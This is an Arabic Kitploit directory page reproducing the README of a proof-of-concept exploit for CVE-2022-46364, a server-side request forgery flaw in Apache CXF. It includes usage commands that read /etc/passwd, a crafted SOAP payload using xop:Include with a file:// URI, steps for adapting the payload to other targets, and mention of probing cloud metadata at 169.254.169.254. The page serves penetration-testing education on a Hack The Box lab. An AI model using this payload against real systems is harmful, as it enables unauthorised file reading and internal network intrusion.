Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-46364 — استغلال لإثبات المفهوم لـ CVE-2022-46364، وهي ثغرة SSRF في Apache CXF تسمح بقراءة ملفات عشوائية واستكشاف الشبكة الداخلية عبر طلبات SOAP مفبركة من نوع MTOM/XOP. | Kitploit
أدوات/GitHubGitHub/c0gnit00/cve-2022-46364
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

استغلال لإثبات المفهوم لـ CVE-2022-46364، وهي ثغرة SSRF في Apache CXF تسمح بقراءة ملفات عشوائية واستكشاف الشبكة الداخلية عبر طلبات SOAP مفبركة من نوع MTOM/XOP.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF (قراءة ملف)

إثبات المفهوم لاستغلال CVE-2022-46364 — ثغرة تزوير الطلب من جانب الخادم (SSRF) في Apache CXF في معالجة طلبات MTOM/XOP.


ملخص الثغرة

CVE-2022-46364 تؤثر على Apache CXF قبل الإصدارين 3.4.10 و 3.5.5. عندما يتم تمكين MTOM (آلية تحسين نقل الرسائل) على خدمة SOAP، يقوم مفكك CXF بالتحقق بشكل غير صحيح من سمة href داخل عناصر <xop:Include>. بدلاً من تقييد href بعناوين cid: (كما هو مطلوب في مواصفات W3C XOP)، يقوم CXF بتفسير عناوين URI عشوائية — بما في ذلك file:// و http:// و https://.

يسمح هذا لمهاجم غير مصادق بـ:

  • قراءة الملفات المحلية العشوائية ()
file:///etc/passwd
  • القيام بـ SSRF ضد الخدمات الداخلية (http://169.254.169.254/)
  • الوصول المحتمل إلى نقاط نهاية البيانات الوصفية السحابية أو واجهات برمجة التطبيقات الداخلية

  • الهدف

    تم كتابة واختبار إثبات المفهوم هذا ضد آلة Hack The Box:

    نقطة النهاية المستهدفة: http://devarea.htb:8080/employeeservice

    ولكن مع تغييرات صغيرة في حمولة XML وفقًا لـ WSDL الهدف، يمكن تكييفه مع البيئة المستهدفة.


    الاستخدام

    قراءة /etc/passwd (الهدف الافتراضي)

    عنوان URL الافتراضي هو http://devarea.htb:8080/employeeservice.

    root@kitploit:~
    python3 CVE-2022-46364.py --file /etc/passwd
    

    عنوان URL مخصص

    root@kitploit:~
    python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd
    

    وضع المفصل — عرض الطلب والاستجابة الخام

    root@kitploit:~
    python3 CVE-2022-46364.py --file /etc/passwd --verbose
    

    التكيف مع الأهداف الأخرى

    هام: هذا السكريبت مبرمج خصيصًا لهيكل WSDL الخاص بـ HTB DevArea. لاستخدامه ضد خدمة Apache CXF ضعيفة أخرى، يجب تعديل حمولة SOAP داخل build_payload() لتتوافق مع عقد WSDL الهدف.

    خطوات التكيف:

    1. جلب WSDL من الهدف:

      root@kitploit:~
      curl http://target:8080/employeeservice?wsdl
      
    2. تحديد تفاصيل الخدمة:

      • targetNamespace (مثل http://devarea.htb/)
      • اسم العملية (مثل submitReport)
      • هيكل المعاملات (مثل <arg0> مع <content> متداخل)
    3. تعديل الحمولة في build_payload():

      • تحديث مساحة الاسم (xmlns:dev="...")
      • تحديث اسم العملية (<dev:submitReport>)
      • تحديث غلاف المعامل (<arg0>)
      • وضع <xop:Include href="file://{filepath}"/> داخل حقل سيعالجه الخادم كمرفق
    4. تحديث --url عند تشغيل السكريبت.

    مثال على تكييف WSDL

    بالنظر إلى مقتطف WSDL هذا:

    root@kitploit:~
    <wsdl:definitions targetNamespace="http://example.com/">
      <wsdl:operation name="uploadDocument">
        <wsdl:input message="tns:uploadDocument"/>
      </wsdl:operation>
    </wsdl:definitions>
    

    يجب أن تصبح حمولتك:

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
      <soapenv:Body>
        <ex:uploadDocument>
          <document>
            <xop:Include href="file:///etc/passwd"/>
          </document>
        </ex:uploadDocument>
      </soapenv:Body>
    </soapenv:Envelope>
    

    كيف يعمل

    1. يقوم السكريبت بصياغة طلب HTTP من نوع multipart/related مع Content-Type: application/xop+xml.
    2. داخل جسم SOAP، يتم وضع عنصر <xop:Include href="file:///etc/passwd"/>.
    3. يعالج خادم CXF الضعيف هذا كمرجع مرفق ويقوم بتفسير URI file://.
    4. تتم قراءة محتويات الملف، وتشفيرها بـ base64 بواسطة الخادم، وإعادتها داخل عنصر <return> الخاص بـ SOAP.
    5. يستخرج السكريبت سلسلة base64 بعد Content: ويفك تشفيرها.

    المراجع

    المصدرالرابط
    استشارة Apache CXF الأمنيةCVE-2022-46364
    إدخال NVDNVD — CVE-2022-46364
    تذكرة Apache Jira (CXF-8706)CXF-8706
    مواصفات W3C XOPXML-binary Optimized Packaging
    تحليل متعمق من PenligentCVE-2022-46364 PoC in Practice
    HTB DevAreaHack The Box — DevArea

    إخلاء المسؤولية

    هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط. احصل دائمًا على إذن صريح قبل اختبار الأنظمة التي لا تملكها. المؤلف ليس مسؤولاً عن أي سوء استخدام أو ضرر ناتج عن هذا السكريبت.


    الترخيص

    ترخيص MIT — يمكنك استخدامه وتعديله ومشاركته مع الإسناد المناسب.

    تنزيل الأداة